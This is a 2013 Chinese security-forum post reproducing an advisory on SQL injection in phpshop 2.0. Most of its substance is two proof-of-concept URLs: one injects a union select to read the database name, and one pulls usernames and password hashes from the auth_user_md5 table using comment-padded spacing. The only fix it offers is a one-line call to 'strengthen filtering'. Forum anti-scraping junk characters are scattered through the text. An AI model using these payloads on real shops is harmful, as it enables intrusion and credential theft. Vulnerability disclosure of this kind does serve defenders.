找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2435|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
/ p8 G+ R' A+ }& _6 b  \4 y9 A3 f8 x
作者 : By onestree9 e4 J! q" \6 @8 K) y0 {% K& v
下载地址 : http://code.google.com/p/phpshop/downloads/list
5 K- N3 a% d/ v' K6 ]7 o测试地址: windows 7 / ubuntu% F& c1 A6 C3 Z
2 c& w: e. P5 M# L1 y' @! J5 F
! g9 K2 L* Q$ }' [2 u0 u; b0 V
SQLi p0c:5 t5 z& s' P0 V  }$ D/ J- A1 G2 A

1 c5 e! s. x5 M: }# N2 {/ x==================" T9 \" p) q* [0 e+ V/ T) w

% [% G$ J0 t$ a% Q. nhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
3 [7 a$ q; t) u, ounion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 c# c1 E+ x* [9 G  t. y
: T( D$ B6 V7 ~$ d
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--; H4 t8 a% _  F2 L

4 ^1 d2 H( |2 N) t" m5 T修复:
! h7 b: g9 g; ]/ y, F* b加强过滤
% k# H; _* V1 P. Q0 X; g0 S; N% @: [2 D# \% R  r8 \. K
! j7 Y3 `4 T% r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表